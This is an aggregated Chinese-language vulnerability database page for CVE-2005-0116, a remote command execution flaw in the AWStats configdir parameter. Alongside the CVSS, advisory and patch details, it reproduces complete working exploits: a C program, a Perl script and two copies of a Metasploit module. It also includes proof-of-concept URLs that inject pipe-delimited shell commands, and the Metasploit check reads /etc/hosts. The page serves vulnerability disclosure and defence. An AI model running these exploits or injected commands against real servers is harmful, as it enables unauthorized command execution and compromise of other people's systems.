CVE-2005-0116
CVSS7.5
发布时间 :2005-01-18 00:00:00
修订时间 :2008-09-05 16:45:22
NMCOEPS    

[原文]AWStats 6.1, and other versions before 6.3, allows remote attackers to execute arbitrary commands via shell metacharacters in the configdir parameter to aswtats.pl.


[CNNVD]AwStats aswtats.pl 远程命令执行漏洞(CNNVD-200501-256)

        AwStats是一款基于Web的网站访问统计程序。
        AwStats6.1及其他6.3之前版本中存在命令执行漏洞。
        由于aswtats.pl对configdir参数值没有进行充分过滤,远程攻击者可利用此漏洞执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-20 [输入验证不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0116
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0116
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-256
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/272296
(VENDOR_ADVISORY)  CERT-VN  VU#272296
http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities&flashstatus=false
(VENDOR_ADVISORY)  IDEFENSE  20050117 AWStats Remote Command Execution Vulnerability
http://secunia.com/advisories/13893/
(VENDOR_ADVISORY)  SECUNIA  13893
http://awstats.sourceforge.net/docs/awstats_changelog.txt
(VENDOR_ADVISORY)  CONFIRM  http://awstats.sourceforge.net/docs/awstats_changelog.txt
http://www.securityfocus.com/bid/12298
(UNKNOWN)  BID  12298
http://www.osvdb.org/13002
(UNKNOWN)  OSVDB  13002
http://packetstormsecurity.org/0501-exploits/AWStatsVulnAnalysis.pdf
(UNKNOWN)  MISC  http://packetstormsecurity.org/0501-exploits/AWStatsVulnAnalysis.pdf

- 漏洞信息

AwStats aswtats.pl 远程命令执行漏洞
高危 输入验证
2005-01-18 00:00:00 2005-10-20 00:00:00
远程  
        AwStats是一款基于Web的网站访问统计程序。
        AwStats6.1及其他6.3之前版本中存在命令执行漏洞。
        由于aswtats.pl对configdir参数值没有进行充分过滤,远程攻击者可利用此漏洞执行任意命令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://awstats.sourceforge.net/#DOWNLOAD

- 漏洞信息 (772)

AWStats (6.0-6.2) configdir Remote Command Execution Exploit (c code) (EDBID:772)
cgi webapps
2005-01-25 Verified
0 Thunder
N/A [点击下载]
/*
AwStats exploit by Thunder, molnar_rcs@yahoo.com

This exploit makes use of the remote command execution bug discovered in
AwStats ver 6.2 and below. The bug resides in the awstats.pl perl script.
The script does not sanitise correctly the user input for the
`configdir` parameter. If the users sends a command prefixed and postfixed
with | , the command will be executed. An example would be:

Let's execute '/usr/bin/w':
>
http://localhost/cgi-bin/awstats.pl?configdir=%20|%20/usr/bin/w%20|%20
<

Awstat output:
>
Error: LogFile parameter is not defined in config/domain file
Setup (' | /usr/bin/w | /awstats.localhost.conf' file, web server or permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).
<

That's it. Our command was executed.
This bug is fixed in AwStats ver 6.3 and a patch was released for all versions, but vulnerable
AwStat is still available for download on several sites (ex. www.topshareware.com).

Type `gcc awexpl.c - o awexpl` to compile the exploit and `./awexpl -u` for usage.

Note:
Just indexing the commands with | will not always work, or might not work at all. I checked
it on my own awstats 6.0 install, and it failed. So, whoever tried the same on his own
script and was surprised to see that (although the version he uses is said to be prone to the
remote command execution bug) nothing happened, should patch or upgrade to Awstat 6.3 asap.
As far as i know all unpached versions prior to 6.3 are vulnerable and commands prefixed and
postfixed by a | character WILL be executed. Beware!

Oh, I almost forgot, the disclaimer :)

THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
AND WITHOUT ANY WARRANTY.

Robert Molnar,
21th jan 2005
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
//#include <unistd.h>
#include <arpa/inet.h>
#include <string.h>

void usage(char *pname)
{
printf("# AWStats exploit by Thunder, molnar_rcs@yahoo.com\n"
"# Usage: %s -h <host> -i <ip> [-s Script] [-p Path] [-o Port] [-c Commands] [-u]\n"
"\t-h : target host name, default is `localhost`\n"
"\t-i : target IP (to wich host name resolvs)\n"
"\t-s : script name, default is `awstats.pl`\n"
"\t-p : script path, default is `/cgi-bin`\n"
"\t-o : specify port to connect to, default is `80`\n"
"\t-c : specify commands to be executed, the exploit will create a\n"
"\t : file named `OWNED` in `/tmp` by default\n"
"\t-u : usage\n\n"
"# Example: %s -h localhost -i 127.0.0.1\n"
"# : %s -h localhost -i 127.0.0.1 -p /~user/cgi-bin\n"
"# : %s -h localhost -i 127.0.0.1 -p /~user/cgi-bin -c \"/usr/bin/id\"\n"
, pname, pname, pname, pname);

exit(0);
}

char * urlEncode(char *inC)
{
int c, i, j = 0;
char *h = "0123456789abcdef";
char retval[1024], res[3072];
memcpy(retval, inC, strlen(inC));
retval[strlen(inC)] = '\0';
for(i=0; i < strlen(inC); i++){
c = retval[i];
if( 'a' <= c && c <= 'z'
|| 'A' <= c && c <= 'Z'
|| '0' <= c && c <= '9'
|| c == '-' || c == '_' || c == '.')
res[j++] = c;
else {
res[j++] = '%';
res[j++] = h[c >> 4];
res[j++] = h[c & 0x0f];
}
}
return res;

}


char *buildHeader(char *Xhost, char *Xpath,char *Xscript, char *exeCmd)
{
char Header[5196];

sprintf( Header,
"GET %s/%s?configdir=%s HTTP/1.1\r\n"
"Accept: text/xml,application/xml,application/xhtml+xml,"
"text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,"
"image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: deflate, gzip\r\n"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)\r\n"
"Host: %s\r\n"
"Connection: Keep-Alive\r\n"
"Cache-Control: no-cache\r\n"
"\r\n"
, Xpath, Xscript, urlEncode(exeCmd), Xhost );
return Header;
}


void exploit(char *Xhost, char *Xpath,char *Xscript, char *exeCmd, char *Xip, int Xport)
{
int sock, disp = 0, count = 0;
struct sockaddr_in sockaddrX;
char *oData, iData;

printf("# AWStats Exploit by Thunder, molnar_rcs@yahoo.com\n");
sockaddrX.sin_port = htons(Xport);
sockaddrX.sin_family = AF_INET;
sockaddrX.sin_addr.s_addr = inet_addr(Xip);
if(Xhost == "localhost")
{
printf("# Using hardcoded (default) options, use `-u` for usage\n"
);
}
printf("# Connecting to %s (%s) ...", Xhost, Xip);
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (connect(sock, (struct sockaddr*)&sockaddrX, 16) < 0)
{
printf("\n# Connect to %s (%s) on port %i failed!\n", Xhost, Xip, Xport);
exit(-1);
}
printf("Done!\n# Building header...");
oData = buildHeader(Xhost, Xpath, Xscript, exeCmd);
printf("Done!\n# Sending data...");
send(sock, oData, strlen(oData), 0);

/* the code below reads the server response byte by byte, this is not needed
while(read(sock, &iData, 1))
putchar(iData);
*/
printf("Done!\n# Exploit finished.\n");
close(sock);
}





int main(int argc, char * argv[])
{
extern char *optarg;
extern int optind, optopt;

int c,
Xport = 80,
isgood = 0;

char *Xhost = "localhost" ,
*Xip = "127.0.0.1",
*Xscript = "awstats.pl",
*Xpath = "/cgi-bin";

char exeCmd[1024] = "| echo \"You have been Owned, update AWstat or patch\" > /tmp/OWNED | ";

while ((c = getopt(argc, argv, ":uh:i:s:p:c:o:")) != -1)
{

switch(c)
{
case 'h':
Xhost = optarg;
isgood++;
break;

case 'i':
Xip = optarg;
isgood++;
break;

case 's':
Xscript = optarg;
break;

case 'p':
Xpath = optarg;
break;

case 'c':
if(strlen(optarg) > 1018)
{
printf("# `-c` argument can't exceed 1024 bytes (command to long)");
exit(0);
}
sprintf(exeCmd, " | %s | ", optarg);
break;

case 'o':
Xport = atoi(optarg);
break;

case 'u':
usage(argv[0]);
break;

case '?':
printf("# Unknown option `-%c`\n", optopt);
break;


}
}


if( isgood == 1)
{
printf("# Please specify both host `-h` and ip `-i`\n");
exit(0);
}

exploit(Xhost, Xpath, Xscript, exeCmd, Xip, Xport);
return 0;
}

// milw0rm.com [2005-01-25]
		

- 漏洞信息 (773)

AWStats (6.0-6.2) configdir Remote Command Execution Exploit (perl code) (EDBID:773)
cgi webapps
2005-01-25 Verified
0 GHC
N/A [点击下载]
#!/usr/bin/perl
#---GHC---------------------------------#
#Remote command execution exploit #
#Product:                                        #
#Advanced Web Statistics 6.0 - 6.2    #
#URL:http://awstats.sourceforge.net  #
#Greets & respects to our friends:     #
#1dt.w0lf and all rst.void.ru              #
#Special greets 2 d0G4                    #
#& cr0n for link on bugtraq               #
#---not-PRIVATE-already--------------#
# bug found by iDEFENSE                 #
# http://www.idefense.com/             #
# application/poi/display?                 #
# id=185&type=vulnerabilities          #
# &flashstatus=true                         #
#-----------------------------------------#

use IO::Socket;
$banner = "
#################################################################
GHC 2005
Remote command execution exploit for:
Advanced Web Statistics 6.0 - 6.2
Usage:
>perl ./GHCaws.pl www.server.net /cgi-bin/awredir.pl \"uname -a\"
#################################################################
";

$bug_param = 'configdir';
$id_start = 'b_exp';
$id_exit = 'e_exp';
$id_print = 0;
$http_head = "\n\n";

sub Print_Report {
$str = $_[0];
if ($str =~ m/$id_exit/i) {
exit;
}
if ($str =~ m/$id_start/i) {
$str =~ s/$id_start//ig;
$id_print = 1;
}
if ($id_print == 1) {
print "$str";
}
}

sub ConnectServer {
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")
|| die "Error\n";
print $socket "GET $dir".'?'.$bug_param.'='."$expl HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
while ($report = <$socket>) {
&Print_Report("$report");
}
}


print "$banner";
if ($ARGV[0] && $ARGV[1] && $ARGV[2]) {
$server = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2]; }
else {
exit;
}

$expl = '|echo '.''.';echo '.$id_start.';'.$cmd.';echo '.$id_exit.';%00';
$expl =~ s/\W/"%".sprintf("%x",ord($&))/eg;
&ConnectServer;

# milw0rm.com [2005-01-25]
		

- 漏洞信息 (16905)

AWStats (6.1-6.2) configdir Remote Command Execution (EDBID:16905)
cgi webapps
2009-12-26 Verified
0 metasploit
N/A [点击下载]
##
# $Id: awstats_configdir_exec.rb 7970 2009-12-26 03:31:20Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AWStats configdir Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
					AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2
					are vulnerable.
			},
			'Author'         => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 7970 $',
			'References'     =>
				[
					['CVE', '2005-0116'],
					['OSVDB', '13002'],
					['BID', '12298'],
					['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Jan 15 2005',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),
				], self.class)
	end

	def check
		res = send_request_cgi({
			'uri'      => datastore['URI'],
			'vars_get' =>
			{
				'configdir' => '|echo;cat /etc/hosts;echo|'
			}
		}, 25)

		if (res and res.body.match(/localhost/))
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		command = Rex::Text.uri_encode(payload.encoded)
		urlconfigdir = datastore['URI'] + "?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|"

		res = send_request_raw({
			'uri'     => urlconfigdir,
			'method'  => 'GET',
			'headers' =>
			{
				'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
				'Connection' => 'Close',
			}
		}, 25)

		if (res)
			print_status("The server returned: #{res.code} #{res.message}")

			m = res.body.match(/YYY\n(.*)\nYYY/m)

			if (m)
				print_status("Command output from the server:")
				print("\n" + m[1] + "\n\n")
			else
				print_status("This server may not be vulnerable")
			end
		else
			print_status("No response from the server")
		end
	end

end

		

- 漏洞信息 (F82351)

AWStats configdir Remote Command Execution (PacketStormID:F82351)
2009-10-30 00:00:00
Matteo Cantoni  
exploit,arbitrary,cgi
CVE-2005-0116
[点击下载]

This Metasploit module exploits an arbitrary command execution vulnerability in the AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2 are vulnerable.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AWStats configdir Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
					AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2
					are vulnerable.
			},
			'Author'         => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-0116'],
					['OSVDB', '13002'],
					['BID', '12298'],
					['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},		
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Jan 15 2005',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),
				], self.class)
	end

	def check
		res = send_request_cgi({
			'uri'      => datastore['URI'],
			'vars_get' =>
			{
				'configdir' => '|echo;cat /etc/hosts;echo|'
			}
		}, 25)

		if (res and res.body.match(/localhost/))
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		command = Rex::Text.uri_encode(payload.encoded)
		urlconfigdir = datastore['URI'] + "?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|"

		res = send_request_raw({
			'uri'     => urlconfigdir,
			'method'  => 'GET',
			'headers' =>
			{
				'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
				'Connection' => 'Close',
			}
		}, 25)

		if (res)
			print_status("The server returned: #{res.code} #{res.message}")

			m = res.body.match(/YYY\n(.*)\nYYY/m)

			if (m)
				print_status("Command output from the server:")
				print("\n" + m[1] + "\n\n")
			else
				print_status("This server may not be vulnerable")
			end
		else
			print_status("No response from the server")
		end
	end

end

    

- 漏洞信息 (F36177)

rt-sa-2005-006.txt (PacketStormID:F36177)
2005-02-25 00:00:00
 
advisory,remote
CVE-2005-0116
[点击下载]

The workaround provided to fix the AWStats flaw in versions 6.2 and below fails to properly block remote command execution.

Advisory: Awstats official workaround flaw

A group of students at our lab called RedTeam found a flaw in the  
official workaround for the remote command
execution vulnerability in awstats discovered by iDefense.


Details
=======

Product: Awstats
Affected Version: <= 6.2
Immune Version: 6.3
OS affected: all
Security-Risk: high
Remote-Exploit: yes
Vendor-URL: http://awstats.sourceforge.net
Vendor-Status: informed
Advisory-URL:
http://tsyklon.informatik.rwth-aachen.de/redteam/advisories/rt-sa-2005 
-006
Advisory-Status: public
CVE: GENERIC-MAP-NOMATCH

Introduction
============

iDefense found a remote command execution vulnerability in awstats <=
6.2, see CAN-2005-0116.

The official awstats website tells users that they are safe from remote
command execution if they set the variable
$!AllowToUpdateStatsFromBrowser to 0. This is not true, as the exploit
can still be triggered.

More Details
============

In awstats.pl the variable $configdir, which is used to exploit, can
still be set remotely. Setting $!AllowToUpdateStatsFromBrowser to 0
only removes the link to the button which can be used to trigger
updates. The variable can still be assigned per GET request.

Proof of Concept
================

http://path/to/awstats/awstats.pl?configdir=|cd%20/ 
tmp;%20touch%20evilfile;

Workaround
==========

Use the workaround provided by iDefense. See their advisory for the
original vulnerability.

Fix
===

Fixed in version 6.3.

Security Risk
=============

High, as arbitrary commands can be executed on the vulnerable system.

History
=======

2005-02-12 eldy@users.sourceforge.net informed
2005-02-12 CVE number requested
2005-02-14 issue does not qualify for a CVE number. posted.

RedTeam
=======

RedTeam is a penetration testing group working at the Laboratory for
Dependable Distributed Systems at RWTH-Aachen University. You can find
more Information on the RedTeam Project at
http://tsyklon.informatik.rwth-aachen.de/redteam/


-- 
Maximillian Dornseif, Dipl. Jur., CISSP
Laboratory for Dependable Distributed Systems, RWTH Aachen University
Tel. +49 241 80-21431 - http://md.hudora.de/
    

- 漏洞信息

13002
AWStats awstats.pl configdir Parameter Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

AWStats contains a flaw that may allow a malicious user to issue arbitray commands under the web server privileges. The issue is triggered when using the pipe character (|) and shell metacaracters in the 'configdir' variable of the awstats.pl script. Such input is not santitized before being passed to the perl 'open()' command to be executed.

- 时间线

2005-01-01 Unknow
2005-01-26 Unknow

- 解决方案

Upgrade to version 6.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

AWStats Remote Command Execution Vulnerability
Input Validation Error 12298
Yes No
2005-01-15 12:00:00 2006-12-13 03:43:00
The discoverer of this issue wishes to remain anonymous.

- 受影响的程序版本

S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0 i386
S.u.S.E. Linux 8.0
Gentoo Linux
AWStats AWStats 6.2
AWStats AWStats 6.1
AWStats AWStats 6.0
AWStats AWStats 5.9
AWStats AWStats 5.8
AWStats AWStats 5.7
AWStats AWStats 5.6
AWStats AWStats 5.5
AWStats AWStats 5.4
AWStats AWStats 5.3
AWStats AWStats 5.2
AWStats AWStats 5.1
AWStats AWStats 5.0
AWStats AWStats 6.3

- 不受影响的程序版本

AWStats AWStats 6.3

- 漏洞讨论

AWStats is reported prone to a remote arbitrary-command-execution vulnerability because the software fails to sufficiently sanitize user-supplied data.

An attacker can prefix arbitrary commands with the '|' character and have them execute in the context of the server through a URI parameter.

This issue was originally specified in BID 12270 (AWStats Multiple Unspecified Remote Input Validation Vulnerabilities). Due to the availability of further details, it is being assigned a new BID.

- 漏洞利用

An exploit is not required.

The following proof of concept supplied by <newbug@chroot.org> is available:

http://www.example.com/awstats/awstats.pl?configdir=|/bin/ls|

Proof of concept GHCaws.pl has been supplied by GHC.

Proof of concept awexpl.c has been supplied by Thunder <molnar_rcs@yahoo.com>.

- 解决方案

The vendor has released an upgrade to address this issue. Please see the references for more information.


AWStats AWStats 5.0

AWStats AWStats 5.1

AWStats AWStats 5.2

AWStats AWStats 5.3

AWStats AWStats 5.4

AWStats AWStats 5.5

AWStats AWStats 5.6

AWStats AWStats 5.7

AWStats AWStats 5.8

AWStats AWStats 5.9

AWStats AWStats 6.0

AWStats AWStats 6.1

AWStats AWStats 6.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站